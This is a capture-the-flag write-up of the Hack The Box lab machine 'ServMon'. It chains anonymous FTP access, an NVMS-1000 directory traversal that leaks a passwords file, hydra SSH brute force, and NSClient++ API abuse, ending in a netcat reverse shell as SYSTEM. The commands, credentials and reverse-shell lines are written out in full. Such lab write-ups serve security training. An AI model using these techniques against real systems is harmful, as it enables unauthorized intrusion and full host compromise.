Contents

🕵 HTB-Writeup : SERVMON

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
└─$ nmap -T5 -p- -sV -A -Pn 10.10.10.184
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           syn-ack Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  07:35PM       <DIR>          Users
| ftp-syst: 
|_  SYST: Windows_NT
22/tcp    open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c7:1a:f6:81:ca:17:78:d0:27:db:cd:46:2a:09:2b:54 (RSA)
|   256 3e:63:ef:3b:6e:3e:4a:90:f3:4c:02:e9:40:67:2e:42 (ECDSA)
|_  256 5a:48:c8:cd:39:78:21:29:ef:fb:ae:82:1d:03:ad:af (ED25519)
80/tcp    open  http
135/tcp   open  msrpc         syn-ack Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack
5666/tcp  open  tcpwrapped
6063/tcp  open  x11?
6699/tcp  open  napster?
8443/tcp  open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC

We face a Windows machine. We have access to a login page on port 80. This port is hosting a NVMS-1000 client. “NVMS-1000 is a monitoring client specifically designed for network video surveillance”.

drawing

Website login page at http://10.10.10.184/Pages/login.htm

Then, we have access to a NSClient++. We need to provide a password to have an access to pages.

drawing

NSClient++ monitoring site at https://10.10.10.184:8443/index.html

ftp

As the nmap scan shows us, we have an access to the FTP server.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
└─$ ftp anonymous@10.10.10.184
Connected to 10.10.10.184.

ftp> ls -alih
02-28-22  07:35PM  <DIR>  Users

ftp> ls -alih
02-28-22  07:36PM  <DIR>  Nadine
02-28-22  07:37PM  <DIR>  Nathan

02-28-22  07:36PM  182  Notes to do.txt  # Nathan
02-28-22  07:36PM  168  Confidential.txt # Nadine

We found 2 folders (Nathan & Nadine).

Nadine - Confidential.txt

1
2
3
4
5
6
7
└─$ cat Confidential.txt 
Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards
Nadine                                                                                                             

A message addressed to Nathan. We now know that there is a possible Passwords.txt file containing passwords on Nathan’s desktop.

Nathan - Notes_to_do.txt

1
2
3
4
5
6
└─$ cat Notes\ to\ do.txt 
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

Vulnerabilities

NVMS-1000

1
2
3
4
5
6
7
└─$ searchsploit nvms 1000                    
------------------------------------- ---------------------------------
 Exploit Title                       |  Path
------------------------------------- ---------------------------------
NVMS 1000 - Directory Traversal      | hardware/webapps/47774.txt
TVT NVMS 1000 - Directory Traversal  | hardware/webapps/48311.py
------------------------------------- ---------------------------------

NVMS is vulnerable to directory traversal exploit. Maybe we can get the content of the password file if Nathan don’t delete it.

NSClient++

1
2
3
4
5
6
7
└─$ searchsploit nsclient                                                           
------------------------------------------------------------- ---------------------------------
 Exploit Title                                               |  Path
------------------------------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remote Code Execution    | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalation                   | windows/local/46802.txt
------------------------------------------------------------- ---------------------------------

NSClient is vulnerable to a local privilege escalation & an authenticated remote code execution on version 0.5.2.35.

NVMS-1000

First, I test if our NVMS is vulnerable to directory traversal.

drawing

Test of the directory traversal

And we have an access to any file ! Let’s try to grab the password file.

drawing

Directory traversal on Passwords.txt file

1
2
3
4
5
6
7
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

Nathan forgot to delete the file :) We got 7 passwords.

Bruteforce logins

Using hydra I found valid credentials for nadine that allow us to connect into the ssh server.

1
2
3
4
5
6
└─$ hydra -L users -P pass 10.10.10.184 ssh
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk

nadine@SERVMON C:\Users\Nadine>type Desktop\user.txt
**************************6e904b 

We can get the user flag :)

Path to the privesc

Local recon

Now that we are connected to the machine, we can get the password of the NSClient++ using nscp command.

1
2
nadine@SERVMON C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT

But we can’t login using that password.

drawing

Login failure using the admin password

Looking at the config file at C:\Program Files\NSClient++\nsclient.ini we found that only localhost is allowed to log in.

1
2
3
4
5
6
7
nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini

; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts = 127.0.0.1

I tried to upload WinPeas but sadly Windows Defender delete it.

NSClient++

As shown by the searchexploit scan, there is a privilege escalation vulnerability on NSClient where a low privilege authenticated user can become an administrator using scripts.

Nathan’s notes and with our local recon, we know that the NSClient service as been lock down. Only local user can access to the webpage.

Running nscp command we can see if the service is vulnerable.

1
2
3
4
PS C:\Program Files\NSClient++> .\nscp.exe test 

[...]
core NSClient++ - 0.5.2.35

The NSClient version is vulnerable!

So we need to have two enabled modules:

  • CheckExternalScripts
  • Scheduler

Using the nscp command we can get all loaded modules.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
PS C:\Program Files\NSClient++> .\nscp.exe settings --list --path /modules
/modules.CheckDisk=disabled
/modules.CheckEventLog=disabled
/modules.CheckExternalScripts=enabled
/modules.CheckHelpers=disabled
/modules.CheckNSCP=disabled
/modules.CheckSystem=disabled
/modules.CheckTaskSched=enabled
/modules.NRPEServer=enabled
/modules.Scheduler=enabled
/modules.WEBServer=enabled

Both needed modules are enabled.

Then, we have to create a bat script that contains a reverse powershell. We have to upload nc on the target.

1
2
3
4
5
# send nc on the target
└─$ scp nc.exe nadine@10.10.10.184:"C:\Windows\Temp\c"

# create a bat script that contains
C:\Windows\Temp\nc.exe 10.10.16.11 4444 -e powershell.exe

Now, we have to add our script to the NSClient settings. I tried to add it on the command line but it won’t work.

1
PS C:\Program Files\NSClient++> .\nscp.exe settings --path "/settings/external scripts/scripts" --key "exploit.bat" --set "C:\Windows\Temp\nc.exe 10.10.16.11 4444 -e powershell.exe"

NSClient++ API

After some research, I found that an API exist. The scripts API can be used to read view and modify the scripts which NSClient++ can run.

First, I check if we have an access to the API.

1
2
3
nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin https://localhost:8443/api/v1/scripts
Enter host password for user 'admin': ew2x6SsGTxjRwXOT
[{"module":"CheckExternalScripts","name":"ext","runtime_url":"https://localhost:8443/api/v1/scripts/ext","title":"CheckExternalScripts"}]

It works! Let’s try to add our script throught the API.

1
2
3
nadine@SERVMON C:\Users\Nadine>curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/exploit.bat --data-binary "C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e cmd.exe"
Enter host password for user 'admin': ew2x6SsGTxjRwXOT
Added exploit as scripts\exploit.bat

Checking if the script is well uploaded.

1
2
3
4
5
6
7
8
PS C:\Program Files\NSClient++> ls .\scripts\

    Directory: C:\Program Files\NSClient++\scripts
[...]
-a----        9/17/2022   8:14 AM             57 exploit.bat

PS C:\Program Files\NSClient++> cat .\scripts\exploit.bat
C:\Windows\Temp\c\nc.exe 10.10.16.11 4444 -e powershell.exe 

Our script is now added. Now, we can use the queries API to run our script.

1
2
3
4
5
6
7
# be sure that nc as not been deleted by Windows Defender it happened to me
curl -s -k -u admin:ew2x6SsGTxjRwXOT "https://localhost:8443/api/v1/queries/exploit/commands/execute?time=10s"

# on the host
└─$ rlwrap nc -lvnp 4444
C:\Program Files\NSClient++>whoami
nt authority\system

It works! We are now system owner ! We can get the flag :)

1
2
C:\Users\Administrator\Desktop>type root.txt
**************************9622c5

Tags

Powershell, Easy, Internal, Apache, Penetration Tester Level 1, Local File Inclusion, CVE-2019-20085, A05:2021-Security Misconfiguration, Enumeration, FTP, Clear Text Credentials, A06:2021-Vulnerable And Outdated Components, Tunneling, SSH, CVE Exploitation, Public Vulnerabilities, NVM-1000, Weak Permissions, NSClient++, Password Spraying, Port Forwarding, Anonymous/Guest Access